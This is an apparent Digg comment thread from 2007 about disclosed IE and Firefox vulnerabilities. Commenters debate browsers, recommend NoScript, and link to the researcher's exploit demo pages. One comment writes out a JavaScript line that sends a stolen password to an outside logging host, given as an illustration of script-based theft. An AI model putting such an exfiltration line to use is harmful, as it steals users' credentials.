114 Comments
- Prysorra, on 10/11/2007, -4/+93
Note for people burying this to "keep it off the front page".
....The hackers already know!
- FKnight, on 10/11/2007, -13/+61
Just remember....
[troll]
If the hole is in IE, it's Microsoft's fault.
If the hole is in Firefox, it's the "stupid" user's fault.
[/troll]
[waiting for bury]
- chrono13, on 10/11/2007, -2/+48
Most browser exploits, present, past and likely future are through explicitly executable code (Javascript, Java, Flash, Shockwave, Silverlight...). Most notably Javascript.
While not a full security solution in itself, NoScript ( http://noscript.net/ ) provides an easy and effective way to Block_All and white-list, either temporarily (session) or permanently, any website you feel needs scripting.
I turn my NoScript to block all scripting and plugins. It makes surfing faster and safer with very little cost (occasional whitelisting). Once you whitelist your oft-used sites, you don't have to fuddle with it much. And there are "Untrusted" entries which are separate and less likely for you to accidentally unblock.
As a further testament to its security, when allowing scripting for a site, the current site is shown in bold and can be allowed scripting for that site only, while the other *six or seven* sites asking for scripting on that page you can simply avoid. If I'm on dailyfunnyflashvideoFoo.com, there is no reason Google analytics, coolweb, CrossScriptAttack.ms, and other websites need scripting permissions as well.
This cuts down on cross site scripting. And by "down" I mean virtually eliminates.
- tsupersonic, on 10/11/2007, -8/+48
How about Opera? (pls don't start Firefox vs. Opera)
- maninblac1, on 10/11/2007, -3/+41
A race condition is hardly an attack vector. This attack had to execute for a minute and a half flipping back and forth between pages before it succeeded on my machine. In the meantime it just went click crazy with sounds so I think that that alone would be obvious enough.
Obviously it has a serious implication, but it's not practical. Even on 2 identical computers there is no way of writing attack code that will perform the same way on them. Thus is the very nature of a race condition. It's across the board after all, it even affects IE7x64 in Vista in protected mode. I'm not too concerned about race conditions as security flaws, too uncertain.
I don't know, overall it doesn't seem such a huge deal, any of the advertised exploits.
- Roger, on 10/11/2007, -3/+37
And you still clicked the link?
- feoza, on 10/11/2007, -14/+47
When I saw the title I was about to post "Firefox FTW!!!" but now that Firefox is part of the guilty squad it's no fun :(
Ah what the hell.....Firefox FTW!!!!
- r2builder, on 10/11/2007, -8/+41
"gaping holes" in a title = instant digg from me.
- inactive, on 10/11/2007, -2/+27
^The one above affects IE^
Here is the Firefox Exploit Test Page: http://lcamtuf.coredump.cx/ifsnatch/
- Dp462090, on 10/11/2007, -0/+22
If you don't associate the phrase "gaping hole," with a certain image, consider yourself lucky.
- MarksALot, on 10/11/2007, -3/+23
@sirber
You've obviously never used NoScript. It works exactly as @chrono13 has described.
You should install it and use it.
- se7en11, on 10/11/2007, -0/+18
Because you're from Utah?
- inactive, on 10/11/2007, -3/+20
(Comment Abuse)
Here is the Test Page: http://lcamtuf.coredump.cx/ierace/
- TheNameless88, on 10/11/2007, -2/+19
Digging up for truth.
I use Firefox, and I find this disturbing, but am I going to be in denial? Nope. There's nothing you can do to be perfectly safe, but at least he's disclosing them, instead of a bad guy using them.
- zepolen, on 10/11/2007, -21/+34
Opera FTW!
- bsiviglia9, on 10/11/2007, -0/+12
Remember when computers were fun -- back in the 1900's before "security"?
- frednofr, on 10/11/2007, -1/+11
"Zalewski also dropped details of a “major” Firefox cross-site IFRAME hijacking bug that could allow malicious code execution, keystroke interception and content spoofing attacks."
- msgyrd, on 10/11/2007, -2/+10
You can add pages to the list of authorized script sources, and admittedly it is quite annoying at first. Most people only visit a handful of pages that actually need javascript though, so once you've completed the process, browsing speed is much faster and you don't need to worry as much about random javascript being executed (google analytics is often a major culprit of slow page loading).
- Eldorian, on 10/11/2007, -15/+22
Firefox FTW simply because I bet their holes get patched sooner than IE :)
- HigherLogic, on 10/11/2007, -1/+8
It's refreshing to see Firefox users getting a taste of their own medicine when they used to (well, they still do) tell everyone to switch to Firefox because "it was more secure." The same counter-argument was used that less people use it, so of course there are going to be more vulnerabilities on IE. How does it taste?
Fact time. According to Secunia, Opera 9.x has had 4 security vulnerabilities. All of which are currently patched.
But that's not fair, let's look at Firefox when it was still in v1.x: Firefox 1.x had 39 vulnerabilities, 35 were patched. Compare that to Opera 8.x with 15 vulnerabilities, 15 patched; IE 6.x with 110 vulnerabilities, 91 patched; and Safari 1.x with 15 vulnerabilities, 14 patched.
But we all know that's just a silly argument, no point in slamming it down someone's throat :)
http://www.answers.com/topic/features-of-the-opera-internet-suite
- Kickboy, on 10/11/2007, -1/+7
It is interesting to note that according to the comments on Bugzilla, the Firefox 2.0 bug has already been fixed in the trunk. Which means the next security update for firefox (probably 2.0.0.5) will include a fix for this bug.
How's that for fast response?
Here's the bugzilla page: https://bugzilla.mozilla.org/show_bug.cgi?id=381300#c4
- gioma1, on 10/11/2007, -0/+5
new Image().src="http://mypassworddatabase.com/log.php?password=" + escape(stolenPassword);
--
There's a browser safer than Firefox... Firefox, with NoScript - http://noscript.net
- zepolen, on 10/11/2007, -6/+11
You make me resent being an Opera user. ***** fanboy.
- feoza, on 10/11/2007, -1/+5
Was thinking the same thing, it's been on the upcoming page forever.
- UtahApocalyse, on 10/11/2007, -2/+6
Why was I expecting goatse
- BlackOp, on 10/11/2007, -1/+5
It's definitely true that Opera is years ahead of anything else. If the other browser* fanboys actually gave it a chance most of them would love it.
@ hagnar It does have ad blocking. I also use a hosts file from http://everythingisnt.com/hosts.html
Don't know about importing your blocklist, depends on what format it's stored in. If it's stored as a list of plaintext urls, you can probably just paste it under the [exclude] part of urlfilter.ini in your profile folder. You can also get lists for opera like this http://my.opera.com/Tamil/blog/index.dml/tag/urlfilter.ini
*trying to avoid a war
- trogdoor, on 10/11/2007, -0/+4
Because they are all in your head?
A quick search of this page shows that you and I are (as of this comment) the only two people who have even used the word Linux in a comment.
- mrmacky, on 10/11/2007, -0/+3
Almost all software has an exploit... the only software I've ever written that has NO exploit whatsoever is "Hello, World!"
At any given rate, this doesn't affect me much, I'm not one for visiting malicious sites.
The keystroke detection thing scares me a bit however. I wonder if it can ACTUALLY be used to intercept a password. (Store it, and later transmit the data, as opposed to just detecting what you entered)
I'm going to switch back to Lynx or Gopher... all these new phangled browsers with their silly IFRAMES and Flash advertisements, who needs 'em.
- covertbadger, on 10/11/2007, -0/+3
One of those links is talking about an ancient version of Firefox and openly admits that Firefox 2 sorts a lot of the problems out, and your other two links both go to the same page, on which the author concludes that he prefers Firefox.
Not very good at this, are you?
- charityjustice, on 10/11/2007, -3/+6
Wow, if the Firefox exploit allowed "malicious code execution, keystroke interception" but only the IE vulnerability was listed as Critical, that must have been some catastrophic IE bug! Heck, a little keylogging never hurt anyone.
Methinks I detect some pro-Firefox, anti-MS sentiment in that article...
- takeda, on 10/11/2007, -1/+3
"I'll switch to opera as soon as it has ad blocking - and the ability to import my block list."
http://operawiki.info/OperaAdblock
http://help.opera.com/Windows/9.00/en/contentblock.html
As for the format, it's just a text file (urlfilter.ini) with masks of URL links, I believe AdBlock uses a similar format, so it should be as easy as copy&paste
Welcome, new Opera user :D
- MrKC, on 10/11/2007, -0/+2
Use NoScript in Firefox. Block the test links using NoScript and see what happens.
- dkoon, on 10/11/2007, -5/+7
but... but... according to digg.com Firefox is invincible, un-hackable, bug-free because it's open source...
- inactive, on 10/11/2007, -1/+3
Opera rules.
- escapologist, on 10/11/2007, -0/+2
You obviously don't use NoScript. Bad for you.
- mlw4428, on 10/11/2007, -1/+3
For firefox (v2.0.0.4):
The keylogging one worked for me. The dialog suppressing one worked for me as well (had to keep pressing enter however). Troubling...
- chrismgtis, on 10/11/2007, -0/+2
If you have a problem with NoScript, the ease of use or for any matter at all, don't complain, your mom doesn't know how to program a VCR either. It's ok.
- chrisc262, on 10/11/2007, -1/+3
I think it was broadband that made it so much easier to attack unsuspecting internet users
especially due to the exorbitant amount of flash/java/etc ads there are now
- tdous, on 10/11/2007, -1/+3
@dkoon
No, no, you're thinking of Slashdot.
Here it's because it runs on a Mac.
- inactive, on 10/11/2007, -2/+3
or you use VMWARE, use a linked clone of a good image, for surfing, once your computer fucts up, delete the clone and make another one. Clones only take about 30 seconds to create, the only part that is time consuming is installing windows in the VMWARe image, but that takes 10 mins if you stream the disc on a GB Lan
or surf with your common sense and not your dick, just STOP DOWNLOADING PORN
- inactive, on 10/11/2007, -7/+8
Sorry, triple post!
I have performed all these tests on my Mac using the most popular web browsers. Here are the results: PDF WARNING!!!! http://www.ownerofearth.com/TEST.pdf
- inactive, on 10/11/2007, -5/+6
The jokes practically write themselves!
- imacashew, on 10/11/2007, -5/+6
yep, security through obscurity. Apple rode that wave for a pretty long while till lately.
http://www.informationweek.com/news/showArticle.jhtml?articleID=199200243
Hoisted by their own petard.
- inactive, on 10/11/2007, -4/+5
I assume the ppl that gave me neg is because I didn't give reasons.
well here they are why opera is better than FF/IE
http://www.digitalalchemy.tv/2006/10/10-reasons-why-opera-is-better-than.html
http://nedwolf.com/Firefox-Opera-Comparison.htm
http://digg.com/software/Is_Opera_Better_Than_Firefox_
- benlindelof, on 10/11/2007, -0/+1
P.S.S. Yes, you can fix these problems on the client side or the server side. It's nice when browsers protect you, but the servers are ultimately responsible for ensuring that the data sent out cannot be used by an unintended recipient. Server administrators will disagree...
- inactive, on 10/11/2007, -2/+3
Another intelligent human being using Digg. Nice :)
- benlindelof, on 10/11/2007, -0/+1
I've been warning web server operators and administrators about this.
They act stupid and say things like "Prove it!". I remind them I don't work for them. Please fix your security issues.
Whether or not they do so is not my concern. This guy who released this secure information is a hero because he has the guts (that I don't) to show you where you are vulnerable.
Guess what happens when I show someone where they are vulnerable? They get pissed off. Guess what? I don't do that anymore.
It's a sticky situation! Don't get into it if you are emo! The computer has no feelings. Learn to code without emotion and I think you will do a lot better.
If you are not in the internet security business, don't freak out. We are working on it. For now, everything is monitored so we can track what is happening. This way nothing goes undetected and can be later analyzed.
You're in good hands.
P.S. The grammar police and spelling police spam has got to stop. No one cares if someone's keyboard is acting up and they "mispell" words, and we are all getting tired of the spelling and grammar fixes. It's unwanted. That means it's spam. Stop doing it.
- hackeron, on 10/11/2007, -1/+2
Because we get sick and tired of reading about Firefox and other security flaws that only affect Windows users -- If the headline was "Gaping holes exposed in Windows running any web browser" we wouldn't waste our time clicking on the link.
- HigherLogic, on 10/11/2007, -2/+2
Nope, it's all good on my end. The IE one just kept switching back and forth between a Polish version of Google or something, after a minute I got bored and closed it. The Fx one just opened up CNN and blocked a pop-up. Ah, Opera FTRW.
- FutureGuy, on 10/11/2007, -2/+2
The article disclosed more than one bug with Firefox and the iframe one
"Mozilla developers are tracking the issue, which is a variant of a bug that has haunted Firefox since 2006."
It's better to fully patch a bug than release a half-baked one.